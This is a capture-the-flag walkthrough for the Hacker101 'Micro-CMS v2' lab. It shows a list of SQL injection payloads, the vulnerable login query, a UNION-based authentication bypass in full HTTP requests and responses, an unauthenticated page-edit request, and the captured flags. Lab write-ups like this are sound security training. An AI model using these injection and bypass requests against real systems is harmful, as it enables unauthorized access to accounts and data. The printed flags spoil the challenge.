October 28, 2019 · CTF

Hackerone - Micro-CMS v2

Flag 0

use payload from to test out the username/password field has injection issue
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection/Intruder

comes out that the query is

SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')

login can accept few injection payloads
like

3 '&' 200 false false 544 
4 '^' 200 false false 544 
5 '*' 200 false false 544 
26 ' or 'x'='x 200 false false 544 
39 admin' or '1'='1 200 false false 544 
41 admin' or '1'='1'# 200 false false 544 
43 admin'or 1=1 or ''=' 200 false false 544 
46 admin' or 1=1# 200 false false 544

for this payload, we found out that statements has accepted the union issue,
we can try to take an advantage on this case

request

56 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 200 false false 713

response

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 10 Sep 2019 12:12:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 545
Connection: close

Traceback (most recent call last):
  File "./main.py", line 145, in do_login
    if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
    self.errorhandler(self, exc, value)
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
    raise errorvalue
OperationalError: (1222, 'The used SELECT statements have a different number of columns')

After trial and tests,
I come up the following injection

request

POST /0d10032668/login HTTP/1.1
Host: 35.190.155.168
Content-Length: 47
Cache-Control: max-age=0
Origin: http://35.190.155.168
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://35.190.155.168/0d10032668/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=admin2' UNION ALL SELECT '1&password=1

response

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 10 Sep 2019 12:59:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Set-Cookie: l2session=eyJhZG1pbiI6dHJ1ZX0.XXeeKw.zPe8rMO2bKLsE6gML8FQts1Ve9M; HttpOnly; Path=/
Content-Length: 340


<!doctype html>
<html>
 <head>
  <title>Logged in</title>
 </head>
 <body>
  <h1>Logged In!</h1>
  <a href="home">Go Home</a>
  <!-- You got logged in, congrats!  Do you have the real username and password?  If not, might want to do that! -->
 </body>
</html>

Get in that easily.

Now we are going to look for that flag..

back to home,

you will see the private page

request

GET /0d10032668/page/3 HTTP/1.1
Host: 35.190.155.168
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://35.190.155.168/0d10032668/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: l2session=eyJhZG1pbiI6dHJ1ZX0.XXee3w._ZamW0N37U35BvnrDQnL3A9Y1vs
Connection: close


username=admin2%27+UNION+ALL+SELECT+%271&password=1

response

My secret is ^FLAG^f66848fd6e345a2c79e4676d51bdd1b876c9a9758f8b49a6786b86dedf589382$FLAG$

Flag 1

Just submit a post request to edit page with empty Cookie header

request


POST /0d10032668/page/edit/5 HTTP/1.1
Host: 35.190.155.168
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://35.190.155.168/0d10032668/page/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: 
Content-Length: 369

title=Private+Page&body=My

response


HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 10 Sep 2019 13:25:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 76

^FLAG^f3a1295fe628d94ba3edfbd6859558c94ce27ce2b6c2239f7d4cf6f9e6ccdf5f$FLAG$